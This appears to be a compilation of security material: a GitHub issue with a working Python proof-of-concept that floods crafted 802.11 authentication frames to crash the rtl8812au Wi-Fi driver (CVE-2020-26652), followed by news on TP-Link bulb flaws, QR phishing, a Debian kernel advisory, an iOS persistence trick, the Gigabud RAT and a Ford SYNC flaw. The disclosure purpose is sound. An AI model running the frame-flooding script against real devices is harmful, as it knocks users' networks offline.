An issue was discovered in function nl80211_send_chandef in rtl8812au v5.6.4.2 allows attackers to cause a denial of service.

**testing environment**  
root@kali:~# uname -r  
5.6.0-kali2-amd64

**poc:**  
\`

#!/usr/bin/env python  
#coding=utf-8  
import time  
import socket

AP\_MAC = "00:22:66:88:22:00"  
STA\_MAC = "00:13:ef:f1:04:ef"  
ETH\_P\_ALL = 3  
IFACE = "wlan0"

def mac2str(mac):  
return "".join(map(lambda x: chr(int(x, 16)), mac.split(":")))

RADIO = "\\x00"  
RADIO += "\\x00"  
RADIO += "\\x24\\x00"  
RADIO += "\\x2f\\x40\\x00\\xa0"  
RADIO += "\\x20\\x08\\x00\\x00"  
RADIO += "\\x00\\x00\\x00\\x00"  
RADIO += "\\x27"  
RADIO += "\\x43"  
RADIO += "\\x6e\\x25"  
RADIO += "\\xa0\\x00"  
RADIO += "\\x00\\x00"  
RADIO += "\\x10\\x02"  
RADIO += "\\x6c\\x09"  
RADIO += "\\xa0\\x00"  
RADIO += "\\xd0\\x00"  
RADIO += "\\x00"  
RADIO += "\\x00"  
RADIO += "\\xd0"  
RADIO += "\\x00"

AUTH\_REQ\_OPEN = RADIO + "\\xB0" # Type/Subtype  
AUTH\_REQ\_OPEN += "\\x08" # Flags  
AUTH\_REQ\_OPEN += "\\xc3\\x50" # Duration ID  
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # Desti8nation address  
AUTH\_REQ\_OPEN += mac2str(STA\_MAC) # Source address  
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # BSSID  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Sequence control  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication algorithm (open)  
AUTH\_REQ\_OPEN += "\\x01\\x00" # Authentication sequence number  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication status  
AUTH\_REQ\_OPEN += "\\x1f\\xd8" # Authentication status  
AUTH\_REQ\_OPEN += "\\x5a\\x07" # Authentication status  
AUTH\_REQ\_HDR = AUTH\_REQ\_OPEN\[:-6\]

def start\_fuzz():  
s = socket.socket(socket.AF\_PACKET, socket.SOCK\_RAW, socket.htons(ETH\_P\_ALL))  
s.bind((IFACE, ETH\_P\_ALL))  
while True:  
print("send msg:",AUTH\_REQ\_OPEN)  
s.send(AUTH\_REQ\_OPEN)

def main():  
start\_fuzz()

if **name** == "**main**":  
main()  
\`  
when execute poc, we should turn on monitoring mode：  
ip link set wlan0 down  
iw dev wlan0 set type monitor  
ip link set wlan0 up

**result**

[  952.607304] WARNING: CPU: 0 PID: 1293 at net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] [  952.607304] Modules linked in: nfnetlink_queue(E) nfnetlink_log(E) 88XXau(OE) nfnetlink(E) bluetooth(E) drbg(E) ansi_cprng(E) ecdh_generic(E) ecc(E) cfg80211(E) rfkill(E) vsock_loopback(E) vmw_vsock_virtio_transport_common(E) vmw_vsock_vmci_transport(E) vsock(E) intel_rapl_msr(E) intel_rapl_common(E) intel_rapl_perf(E) vmw_balloon(E) joydev(E) serio_raw(E) pcspkr(E) sg(E) vmw_vmci(E) evdev(E) ac(E) binfmt_misc(E) fuse(E) sunrpc(E) ip_tables(E) x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) crc32c_generic(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) crct10dif_pclmul(E) crct10dif_common(E) crc32_pclmul(E) crc32c_intel(E) ghash_clmulni_intel(E) hid_generic(E) usbhid(E) hid(E) sr_mod(E) cdrom(E) ata_generic(E) vmwgfx(E) aesni_intel(E) libaes(E) crypto_simd(E) cryptd(E) glue_helper(E) ttm(E) psmouse(E) drm_kms_helper(E) ata_piix(E) cec(E) uhci_hcd(E) ehci_pci(E) xhci_pci(E) xhci_hcd(E) e1000(E) ehci_hcd(E) usbcore(E) usb_common(E) mptspi(E) mptscsih(E) mptbase(E) [  952.607325]  scsi_transport_spi(E) drm(E) libata(E) i2c_piix4(E) scsi_mod(E) button(E) [  952.607329] CPU: 0 PID: 1293 Comm: RTW_CMD_THREAD Tainted: G           OE     5.6.0-kali2-amd64 #1 Debian 5.6.14-1kali1 [  952.607330] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/29/2019 [  952.607340] RIP: 0010:nl80211_send_chandef+0x14b/0x160 [cfg80211] [  952.607341] Code: 00 00 be a1 00 00 00 48 89 ef 89 44 24 04 e8 7c 8a 07 d6 85 c0 0f 84 7b ff ff ff 41 bc 97 ff ff ff e9 70 ff ff ff 31 c0 eb a7 <0f> 0b 41 bc ea ff ff ff e9 5f ff ff ff e8 c3 c7 cb d5 0f 1f 00 0f [  952.607342] RSP: 0018:ffffa687c088fd80 EFLAGS: 00010246 [  952.607343] RAX: 0000000000000000 RBX: ffffa687c088fe08 RCX: 0000000000000087 [  952.607343] RDX: 00000000c07597ec RSI: 00000000ffff259c RDI: ffffa687c088fe08 [  952.607344] RBP: ffff98e22da4dd00 R08: 0000000000000003 R09: 0000000000000004 [  952.607344] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa687c088fe08 [  952.607344] R13: 0000000000000000 R14: ffff98e22da4dd00 R15: ffff98e2343a3014 [  952.607345] FS:  0000000000000000(0000) GS:ffff98e23be00000(0000) knlGS:0000000000000000 [  952.607346] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [  952.607346] CR2: 00007f9224153030 CR3: 000000007a080005 CR4: 00000000002606f0 [  952.607365] Call Trace: [  952.607395]  nl80211_ch_switch_notify.constprop.0+0xcd/0x170 [cfg80211] [  952.607424]  rtw_cfg80211_ch_switch_notify+0x138/0x147 [88XXau] [  952.607440]  ? rtw_chk_start_clnt_join+0x79/0x79 [88XXau] [  952.607454]  rtw_chk_start_clnt_join+0x72/0x79 [88XXau] [  952.607468]  join_cmd_hdl+0x267/0x373 [88XXau] [  952.607476]  rtw_cmd_thread+0x295/0x3ed [88XXau] [  952.607494]  kthread+0xf9/0x130 [  952.607504]  ? rtw_stop_cmd_thread+0x39/0x39 [88XXau] [  952.607506]  ? kthread_park+0x90/0x90 [  952.607521]  ret_from_fork+0x35/0x40 [  952.607524] ---[ end trace c0d1960d55eb317c ]---

CVE-2020-26652: fuzzing wifi ,network will down,  result is net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] · Issue #730 · aircrack-ng/rtl8812au

By Habiba Rashid
TP-Link Tapo L530E Smart Bulb found vulnerable, putting user WiFi credentials at risk.
This is a post from HackRead.com Read the original post: TP-Link Smart Bulb Users at Risk of WiFi Password Theft

The vulnerabilities of the smart bulb were identified by cybersecurity researchers from Italy and the United Kingdom.

**Summary**

*   Security researchers have found vulnerabilities in the TP-Link Tapo L530E smart bulb and the corresponding Tapo app.

*   These vulnerabilities could allow attackers to steal users’ WiFi passwords and gain unauthorized access to their networks.

*   The vulnerabilities are rated as high and medium severity, and affect both the hardware and software of the smart bulb.

*   TP-Link has acknowledged the vulnerabilities and is working on a fix.

*   In the meantime, users are advised to update the firmware of their smart bulbs and use strong passwords.

In the era of expanding home automation, the convenience of controlling devices remotely and optimizing energy consumption is met with an emerging concern: the security of interconnected smart devices.

A recent investigation by security researchers from Italy and the UK has illuminated potential vulnerabilities in the popular TP-Link Tapo L530E smart bulb and the corresponding Tapo app, exposing users to the risk of having their WiFi passwords stolen by malicious actors.

The TP-Link Tapo L530E smart bulb, a common sight in homes and available on major marketplaces such as Amazon, has become a focal point for researchers due to its extensive adoption. The study (PDF), conducted by experts from the Universita di Catania and the University of London, talks about broader security risks prevalent in the expansive world of Internet of Things (IoT) devices, many of which exhibit subpar authentication safeguards and insecure data transmission practices.

The following four distinct vulnerabilities have been identified within the TP-Link Tapo L530E smart bulb and the Tapo app, each presenting its unique security implications:

**Improper Authentication: **

The primary vulnerability is rooted in improper authentication during the session key exchange process. This flaw permits attackers in close proximity to the device to impersonate it, resulting in the compromise of Tapo user passwords and control over Tapo devices. With a high-severity CVSS v3.1 score of 8.8, this exploit represents a substantial risk.

**Hard-coded Weakness:**

The second vulnerability, also high-severity with a CVSS v3.1 score of 7.6, is a result of a hardcoded short checksum shared secret. Malicious actors can exploit this flaw by engaging in brute-forcing techniques or by decompiling the Tapo app. 

**Predictable encryption_:_**

The third flaw, rated with a medium severity, pertains to the predictable nature of symmetric encryption due to a lack of randomness in its application. 

**Replay Attacks:**

Lastly, the fourth vulnerability allows attackers to conduct replay attacks, effectively replicating previously intercepted messages to manipulate device functions.

Keeping in mind the vulnerabilities above, the researchers showcased several scenarios which a malicious actor may be inclined to employ. In the first scenario, an attacker exploits the first and second vulnerabilities to impersonate the smart bulb and compromise a user’s Tapo account.

By infiltrating the Tapo app, the attacker can extract critical WiFi information, including the SSID and password, enabling unauthorized access to all devices linked to the same network. Though this attack requires the device to be in setup mode, attackers can easily disrupt the bulb’s functionality and prompt a reset, thus enabling the execution of the attack.

For the second scenario, the researchers delved into Man-in-the-Middle (MITM) attacks, showcasing the potential for attackers to intercept and manipulate communications between the Tapo app and the bulb.

By exploiting the first vulnerability, attackers can capture RSA encryption keys, which are then exploited to decode further data exchanges. Moreover, unconfigured Tapo devices can be utilized in MITM attacks to extract sensitive information during the setup process.

TP-Link Tapo L530E smart bulb on Amazon – The data extracted by researchers

In a comment to Hackread.com, Andrew Bolster, Senior R&D Manager for Data Science at Synopsys Software Integrity Group told Hackread.com that, “These new vulnerability notices demonstrate again that while consumers want to believe that the smart devices that we bring into our homes and make part of our lives are somehow completely isolated and secure, security is not that simple.”

Andrew warned that “As Synopsys previously demonstrated with last year’s Vulnerability Advisory on IKEA smart bulbs, these assistive and clever devices can be the weak-link into the trusted home environment; A beachhead for malicious actors to then gain horizontal access to other devices behind the ‘secure’ firewall. And as we add increasingly smart devices, be it fridges, voice assistants, heating controllers, vacuum cleaners, etc, opportunity for security failures to spread expands exponentially.”

“As with any modern security threat model, defence-in-depth and trust-but-verify stand; smart devices should be kept on separate WiFi networks from personal devices where possible, and the inbound/outbound connections into this network should be heavily restricted,” he emphasised.

The findings of this investigation have been responsibly disclosed to TP-Link, prompting acknowledgement from the vendor. Assurances have been made that fixes for the vulnerabilities will be implemented in both the app and the bulb’s firmware. However, specific details about the availability of these fixes and the versions still susceptible remain undisclosed.

Here are some additional safety guidelines that users should follow:

*   Only connect your smart bulbs to trusted networks.
*   Keep your smart bulbs up to date with the latest firmware.
*   Be careful about what information you share with smart bulb apps.
*   Use strong passwords and enable multi-factor authentication for your smart bulb accounts.
*   If you think your smart bulb has been compromised, change your passwords and reset your devices.

In light of these vulnerabilities and the expanding realm of IoT devices, isolating such devices from critical networks, updating firmware and app versions, and bolstering account protection through strong passwords and multi-factor authentication remains the recommended practices.

**RELATED ARTICLES**

1.  IoT devices could help authorities solve criminal cases
2.  Hackers can use flaw in Philips smart light bulbs to spread malware
3.  Hackers can clone your lock keys by recording clicks from smartphone
4.  Whitehat hacker shows how to detect hidden cameras in Airbnb, hotels
5.  Lamphone attack recovers secretive conversations via hanging light bulb

TP-Link Smart Bulb Users at Risk of WiFi Password Theft

An issue in TPLink Smart bulb Tapo series L530 v.1.0.0 and Tapo Application v.2.8.14 allows a remote attacker to obtain sensitive information via the authentication code for the UDP message.

Download PDF

> Abstract: The IoT is getting more and more pervasive. Even the simplest devices, such as a light bulb or an electrical plug, are made "smart" and controllable by our smartphone. This paper describes the findings obtained by applying the PETIoT kill chain to conduct a Vulnerability Assessment and Penetration Testing session on a smart bulb, the Tapo L530E by Tp-Link, currently best seller on Amazon Italy. We found that four vulnerabilities affect the bulb, two of High severity and two of Medium severity according to the CVSS v3.1 scoring system. In short, authentication is not well accounted for and confidentiality is insufficiently achieved by the implemented cryptographic measures. In consequence, an attacker who is nearby the bulb can operate at will not just the bulb but all devices of the Tapo family that the user may have on her Tapo account. Moreover, the attacker can learn the victim's Wi-Fi password, thereby escalating his malicious potential considerably. The paper terminates with an outline of possible fixes.

**Submission history**

From: Davide Bonaventura \[view email\]  
**\[v1\]** Thu, 17 Aug 2023 14:48:04 UTC (990 KB)

CVE-2023-38906: Smart Bulbs can be Hacked to Hack into your Household

Categories: News
Tags: QR codes

Tags:  attachment

Tags:  phishing

Tags:  Bing

Tags:  Microsoft

Tags:  credentials 

Researchers have been monitoring a phishing campaign that uses QR codes and Bing redirects to lead targets to phishing sites.



(Read more...)




The post QR codes used to phish for Microsoft credentials appeared first on Malwarebytes Labs.

Posted: August 21, 2023 by

Researchers have published details about a phishing campaign that uses QR codes to phish for Microsoft credentials.

A QR (Quick Response) code is a kind of two-dimensional barcode that holds encoded data in a graphical black-and-white pattern. The data that a QR code stores can include URLs, email addresses, network details, Wi-Fi passwords, serial numbers, etc.

While QR codes are generally safe, they can easily be manipulated by scammers because they all appear similar to the human eye. A malicious QR code may lead you to a spoofed website designed to drop different malware types or steal your sensitive data, like your password, credit card information, or money.

The use of QR codes in malicious campaigns is not new, and because they can provide contactless access to a product or service they grew in popularity during the pandemic. And because QR codes are images (sent as PNG or PDF attachments in the campaigns reported here) their content is more likely to make it past email filters.

The researchers have been monitoring a campaign since May of 2023 that, although it targeted users from a wide array of industries, seemed to focus on a major energy company based in the US. This undisclosed target received 29% of the over 1,000 emails containing malicious QR codes.

The links in the QR codes used open redirects from legitimate domains associated with Bing, Salesforce, and Cloudflare to send the targets to phishing sites that were after Microsoft credentials. Since the subject of the emails were often spoofed Microsoft security notifications the Bing URLs would not have looked out of place to any victims who noticed them.

The campaign has reportedly shown a significant growth since it was discovered with the volume increased by more than 2,400% since May 2023.

Example of a malicious QR code (courtesy of Cofense)

For cybercriminals, the use of QR codes usually has the disadvantage that they need to be scanned by a mobile device, which is more complex than simply giving targets a link to click on. But in a corporate environment this can also be an advantage as the mobile device might be outside of the protection of the enterprise environment.

The researchers showcase a Bing redirect URL which is likely to be seen as legitimate in light of the other Microsoft mimicry used in this campaign. Many search engines, social media, and other platforms use some form of open redirect, which cybercriminals use to make their links look legitimate. 

example of a Bing redirect URL (Courtesy of Cofense)

**Recommendations**

When it comes to QR codes they are nearly impossible to recognize as malicious by humans, so it takes some extra attention. Some pointers:

*   Treat QR codes like any other link in an unsolicited mail, or possibly even with more caution. If you receive a QR code either in the mail or sent to you by a friend, get in touch with them first and verify that they have indeed sent you the code.
*   When scanning a QR code your device should display the site it will take you to. Pay close attention to that link. Be wary of legitimate domains that are known to use redirects and URL shorteners.
*   Use the built-in scanner through your smartphone's camera to scan for QR codes. There is no need to download another one from the app store since there are fake QR code scanners and ones that come bundled with unwanted extras.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

**RELATED ARTICLES**

QR codes used to phish for Microsoft credentials

Debian Linux Security Advisory 5480-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5480-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 18, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2022-4269 CVE-2022-39189 CVE-2023-1206 CVE-2023-1380  
                 CVE-2023-2002 CVE-2023-2007 CVE-2023-2124 CVE-2023-2269  
                 CVE-2023-2898 CVE-2023-3090 CVE-2023-3111 CVE-2023-3212  
                 CVE-2023-3268 CVE-2023-3338 CVE-2023-3389 CVE-2023-3609  
                 CVE-2023-3611 CVE-2023-3776 CVE-2023-3863 CVE-2023-4004  
                 CVE-2023-4128 CVE-2023-4132 CVE-2023-4147 CVE-2023-4194  
                 CVE-2023-4273 CVE-2023-20588 CVE-2023-21255 CVE-2023-21400  
                 CVE-2023-31084 CVE-2023-34319 CVE-2023-35788 CVE-2023-40283

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2022-4269

    William Zhao discovered that a flaw in the Traffic Control (TC)  
    subsystem when using a specific networking configuration  
    (redirecting egress packets to ingress using TC action "mirred"),  
    may allow a local unprivileged user to cause a denial of service  
    (triggering a CPU soft lockup).

CVE-2022-39189

    Jann Horn discovered that TLB flush operations are mishandled in the  
    KVM subsystem in certain KVM_VCPU_PREEMPTED situations, which may  
    allow an unprivileged guest user to compromise the guest kernel.

CVE-2023-1206

    It was discovered that the networking stack permits attackers to  
    force hash collisions in the IPv6 connection lookup table, which may  
    result in denial of service (significant increase in the cost of  
    lookups, increased CPU utilization).

CVE-2023-1380

    Jisoo Jang reported a heap out-of-bounds read in the brcmfmac Wi-Fi  
    driver. On systems using this driver, a local user could exploit  
    this to read sensitive information or to cause a denial of service.

CVE-2023-2002

    Ruiahn Li reported an incorrect permissions check in the Bluetooth  
    subsystem. A local user could exploit this to reconfigure local  
    Bluetooth interfaces, resulting in information leaks, spoofing, or  
    denial of service (loss of connection).

CVE-2023-2007

    Lucas Leong and Reno Robert discovered a time-of-check-to-time-of-  
    use flaw in the dpt_i2o SCSI controller driver. A local user with  
    access to a SCSI device using this driver could exploit this for  
    privilege escalation.

    This flaw has been mitigated by removing support for the I2OUSRCMD  
    operation.

CVE-2023-2124

    Kyle Zeng, Akshay Ajayan and Fish Wang discovered that missing  
    metadata validation may result in denial of service or potential  
    privilege escalation if a corrupted XFS disk image is mounted.

CVE-2023-2269

    Zheng Zhang reported that improper handling of locking in the device  
    mapper implementation may result in denial of service.

CVE-2023-2898

    It was discovered that missing sanitising in the f2fs file  
    system may result in denial of service if a malformed file  
    system is accessed.

CVE-2023-3090

    It was discovered that missing initialization in ipvlan networking  
    may lead to an out-of-bounds write vulnerability, resulting in  
    denial of service or potentially the execution of arbitrary code.

CVE-2023-3111

    The TOTE Robot tool found a flaw in the Btrfs filesystem driver that  
    can lead to a use-after-free. It's unclear whether an unprivileged  
    user can exploit this.

CVE-2023-3212

    Yang Lan that missing validation in the GFS2 filesystem could result  
    in denial of service via a NULL pointer dereference when mounting a  
    malformed GFS2 filesystem.

CVE-2023-3268

    It was discovered that an out-of-bounds memory access in relayfs  
    could result in denial of service or an information leak.

CVE-2023-3338

    Davide Ornaghi discovered a flaw in the DECnet protocol  
    implementation which could lead to a null pointer dereference or  
    use-after-free. A local user can exploit this to cause a denial of service  
    (crash or memory corruption) and probably for privilege escalation.

    This flaw has been mitigated by removing the DECnet protocol  
    implementation.

CVE-2023-3389

    Querijn Voet discovered a use-after-free in the io_uring subsystem,  
    which may result in denial of service or privilege escalation.

CVE-2023-3611

    It was discovered that an out-of-bounds write in the traffic control  
    subsystem for the Quick Fair Queueing scheduler (QFQ) may result in  
    denial of service or privilege escalation.

CVE-2023-3609 / CVE-2023-3776 / CVE-2023-4128

    It was discovered that a use-after-free in the cls_fw, cls_u32,  
    cls_route and network classifiers may result in denial of service or  
    potential local privilege escalation.

CVE-2023-3863

    It was discovered that a use-after-free in the NFC implementation  
    may result in denial of service, an information leak or potential  
    local privilege escalation.

CVE-2023-4004

    It was discovered that a use-after-free in Netfilter's  
    implementation of PIPAPO (PIle PAcket POlicies) may result in denial  
    of service or potential local privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-4132

    A use-after-free in the driver for Siano SMS1xxx based MDTV  
    receivers may result in local denial of service.

CVE-2023-4147

    Kevin Rich discovered a use-after-free in Netfilter when adding a  
    rule with NFTA_RULE_CHAIN_ID, which may result in local privilege  
    escalation for a user with the CAP_NET_ADMIN capability in any user  
    or network namespace.

CVE-2023-4194

    A type confusion in the implementation of TUN/TAP network devices  
    may allow a local user to bypass network filters.

CVE-2023-4273

    Maxim Suhanov discovered a stack overflow in the exFAT driver, which  
    may result in local denial of service via a malformed file system.

CVE-2023-20588

    Jana Hofmann, Emanuele Vannacci, Cedric Fournet, Boris Koepf and  
    Oleksii Oleksenko discovered that on some AMD CPUs with the Zen1  
    micro architecture an integer division by zero may leave stale  
    quotient data from a previous division, resulting in a potential  
    leak of sensitive data.

CVE-2023-21255

    A use-after-free was discovered in the in the Android binder driver,  
    which may result in local privilege escalation on systems where the  
    binder driver is loaded.

CVE-2023-21400

    Ye Zhang and Nicolas Wu discovered a double-free in the io_uring  
    subsystem, which may result in denial of service or privilege  
    escalation.

CVE-2023-31084

    It was discovered that the DVB Core driver does not properly handle  
    locking of certain events, allowing a local user to cause a denial  
    of service.

CVE-2023-34319

    Ross Lagerwall discovered a buffer overrun in Xen's netback driver  
    which may allow a Xen guest to cause denial of service to the  
    virtualisation host my sending malformed packets.

CVE-2023-35788

    Hangyu Hua that an off-by-one in the Flower traffic classifier may  
    result in local of service or the execution of privilege escalation.

CVE-2023-40283

    A use-after-free was discovered in Bluetooth L2CAP socket handling.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.191-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTfvC5fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QmDBAAnjvIhfwWPmYeanAyC9Hwdx2L9ATqx235c5K4I9xOWCRR+1oiM3WIKDz1  
jnFbRnCKEPMUeIMWaSwXj11OvjDIY31nnUqRzf/hoT8PQ6dHi1p/fpmjReLFL9sw  
FoYhyabKtkGMBUXF4dCz2Qn62yPGFDgupBMlK1BQ1kJvxZABaKG0PGTqqPX4iOla  
DkbNvwq2lLr0K6oYKp8Nu+tQ+1I6U8PI4EvAlYbybvo0WXvbZy9pOmBilJhBqYrC  
6Ql1ndovBzDi3H8Qo+C8WJRdFcjP+dBOpW/lu9EcHbNmHG1cWLO8EexqvfoW8GAV  
qf0CEtULUwsn6pM5uW+SEgfsiETFPXbzQt+FxH2L2NGLhLmb73dIK074/Ids8lx4  
V4tNh+pVTli+sTCB6uGaRQvM4uNTxm5mV9+saacM6vel6KvD/qRreCMCDhvk9CkS  
ETg3sJjbw/Hv83RwfqTlXicJh5KpA5JikrztMnHNAQKru93uSH6dOLpOd45/SeA8  
KHw604LkeuzAiqFltE76HS1h/jDXO0Mfb0UvIH5N1tmgcr3qaRaFvZQ6sYy8NTHa  
6N5pnfKJJXRuYe/aadjlC2xQmUMvU8HD39dqp6Z+XFjjzLmz5NN9rLHZKqaLSx6C  
IFId+FMkkKLeQFWylM+mA5WwiUTEx0JvREFPjtOjJ4RDHf3Mmws=  
=z/8h  
-----END PGP SIGNATURE-----

Debian Security Advisory 5480-1

Cybersecurity researchers have documented a novel post-exploit persistence technique on iOS 16 that could be abused to fly under the radar and main access to an Apple device even when the victim believes it is offline.
The method "tricks the victim into thinking their device's Airplane Mode works when in reality the attacker (following successful device exploit) has planted an artificial

Mobile Security / Vulnerability

Cybersecurity researchers have documented a novel post-exploit persistence technique on iOS 16 that could be abused to fly under the radar and main access to an Apple device even when the victim believes it is offline.

The method "tricks the victim into thinking their device's Airplane Mode works when in reality the attacker (following successful device exploit) has planted an artificial Airplane Mode which edits the UI to display Airplane Mode icon and cuts internet connection to all apps except the attacker application," Jamf Threat Labs researchers Hu Ke and Nir Avraham said in a report shared with The Hacker News.

Airplane Mode, as the name implies, allows users to turn off wireless features in their devices, effectively preventing them from connecting to Wi-Fi networks, cellular data, and Bluetooth as well as sending or receiving calls and text messages.

The approach devised by Jamf, in a nutshell, provides an illusion to the user that the Airplane Mode is on while allowing a malicious actor to stealthily maintain a cellular network connection for a rogue application.

"When the user turns on Airplane Mode, the network interface pdp\_ip0 (cellular data) will no longer display ipv4/ipv6 ip addresses," the researchers explained. "The cellular network is disconnected and unusable, at least to the user space level."

While the underlying changes are carried out by CommCenter, the user interface (UI) modifications, such as the icon transitions are taken care of by the SpringBoard.

The goal of the attack, then, is to devise an artificial Airplane Mode that keeps the UI changes intact but retains cellular connectivity for a malicious payload installed on the device by other means.

"After enabling Airplane Mode without a Wi-Fi connection, users would expect that opening Safari would result in no connection to the internet," the researchers said. "The typical experience is a notification window that prompts a user to 'Turn Off Airplane Mode.'"

To pull off the ruse, the CommCenter daemon is utilized to block cellular data access for specific apps and disguise it as Airplane Mode by means of a hooked function that alters the alert window to look like the setting has been turned on.

It's worth noting that the operating system kernel notifies the CommCenter via a callback routine, which, in turn, notifies the SpringBoard to display the pop-up.

A closer examination of the CommCenter daemon has also revealed the presence of an SQL database that's used to record the cellular data access status of each app (aka bundle ID), with a flag set to the value "8" if an application is blocked from accessing it.

"Using this database of installed application bundle IDs we can now selectively block or allow an app to access Wi-Fi or cellular data using the following code," the researchers said.

"When combined with the other techniques outlined above, the fake Airplane Mode now appears to act just as the real one, except that the internet ban does not apply to non-application processes such as a backdoor trojan."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode

By Habiba Rashid
Emergence of Gigabud Banking Trojan Threatens Financial Institutions Globally.
This is a post from HackRead.com Read the original post: New Gigabud Android RAT Bypasses 2FA, Targets Financial Orgs

*   **New Malware Variant:** Gigabud introduces a fresh wave of sophisticated cyber danger.

*   **Global Operation:** Gigabud has targeted at least 25 companies, financial institutions, and government departments across several countries.

*   **Bypasses 2FA:** Gigabud malware can adeptly circumvent two-factor authentication (2FA).

*   **Targets Financial Giants:** Financial institutions face a growing threat from Gigabud’s focused attacks.

*   **Gigabud family:** Gigabud.Loan variant presents itself as a fake loan application, luring victims with promises of low-interest loans.

*   **Emerging Cyber Risk:** The rise of Gigabud underscores the evolving landscape of financial cyber threats.

A new banking trojan named Gigabud has emerged as a formidable adversary, posing a persistent danger to financial institutions worldwide. Originating as an Android Remote Access Trojan (**RAT**), Gigabud first came to the attention of security experts in September 2022 when it targeted a Thailand-based financial organization and its customers across the Asia-Pacific region.

Group-IB’s experts, in response to a customer’s request, undertook a comprehensive analysis of the malware to decode its intricate tactics. The defining feature of Gigabud is its cautious approach to executing malicious actions.

Unlike conventional malware that acts immediately upon infiltration, Gigabud waits for user authorization within the malicious application, a strategy that makes it notably elusive. Instead of relying on HTML overlay attacks, Gigabud employs screen recording to gather sensitive information, further complicating its detection.

One standout feature of Gigabud is its use of accessibility services, which allows it to perform actions on the victim’s device remotely. This capability, known as “TouchAction,” enables the attacker to perform gestures on the user’s device, giving them the power to evade defence mechanisms, including two-factor authentication (**2FA**).

Gigabud RAT has targeted at least 25 companies, financial institutions, and government departments across several countries, aiming to mimic their identities and deceive users.

Researchers also uncovered a parallel threat within the Gigabud family: Gigabud.Loan. This variant presents itself as a fake loan application, luring victims with promises of low-interest loans. Once users engage with the app, they are coerced into providing sensitive personal information, which can later be exploited by the threat actors.

Gigabud.Loan’s modus operandi involves impersonating fictional financial institutions from various countries, such as Thailand, Indonesia, and Peru.

The distribution strategy for both Gigabud.RAT and Gigabud.Loan centers around phishing websites. These websites are disseminated through tactics like “smishing,” where victims are sent misleading messages via instant messengers, SMS, or social networks, leading them to malicious links. In certain cases, the malware is even delivered directly through messages on platforms like **WhatsApp**.

Watch as Group-IB’s researchers looks into Gigabud RAT

Over the course of 2022 to 2023, Group-IB’s researchers detected over 400 Gigabud RAT samples and more than 20 Gigabud.Loan samples using advanced hunting techniques. 

To counteract the threat posed by Gigabud, **Group-IB suggests** a multi-pronged defence strategy. Organizations should prioritize proactive monitoring of user sessions, prioritize client education on safe online practices, and employ digital protection tools.

Users, in turn, are advised to exercise caution when clicking on links, refrain from downloading risky apps, and utilize **reliable VPNs** on public Wi-Fi networks.

**RELATED ARTICLES**

1.  FakeTrade Android Malware Attack Steals Crypto Wallet Data
2.  Android banking malware distributed with fake Google reCAPTCHA
3.  New Android banking malware Xenomorph found in Play Store apps
4.  Experts concerned over emergence of Android banking trojan S.O.V.A.
5.  Iranian Stalkerware ‘Spyhide’ Steals Data from 60,000 Android Devices

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

New Gigabud Android RAT Bypasses 2FA, Targets Financial Orgs

Categories: Exploits and vulnerabilities
Categories: News
Tags: Ford

Tags:  Lincoln

Tags:  SYNC 3

Tags:  CVE-2023-29468

Tags:  TI WLink

Tags:  MCP driver

A vulnerability in the SYNC 3 infotainment will not have a negative effect on driving safety, says Ford.



(Read more...)




The post Ford says it’s safe to drive its cars with a WiFi vulnerability appeared first on Malwarebytes Labs.

Ford has released information about a buffer overflow vulnerability in its SYNC 3 infotainment system.

Ford learned from a supplier that a security researcher had discovered a vulnerability in the Wi-Fi software driver supplied for use in the SYNC 3 infotainment system available on some Ford and Lincoln vehicles. The company said it started an investigation and subsequently decided that the vulnerability does not affect vehicle driving safety.

Ford's SYNC 3 system exists in Ford models from 2015 onward. Other than recent vehicles that have the newest version, most Ford vehicles have SYNC 3. If you have a Ford Owner account, you can go to the Vehicle Dashboard to see what version of SYNC your car has.

Lincoln drivers can check their version on the Lincoln Support site (you will need to enter your VIN number).

The SYNC 3 vulnerability is CVE-2023-29468: a vulnerability in the TI WiLink WL18xx MCP driver. An attacker within wireless range of a potentially vulnerable device can gain the ability to overwrite memory of the host processor executing the MCP driver. Exploiting this vulnerability involves a malicious actor crafting a specific frame to trigger a buffer overflow, potentially leading to remote code execution (RCE).

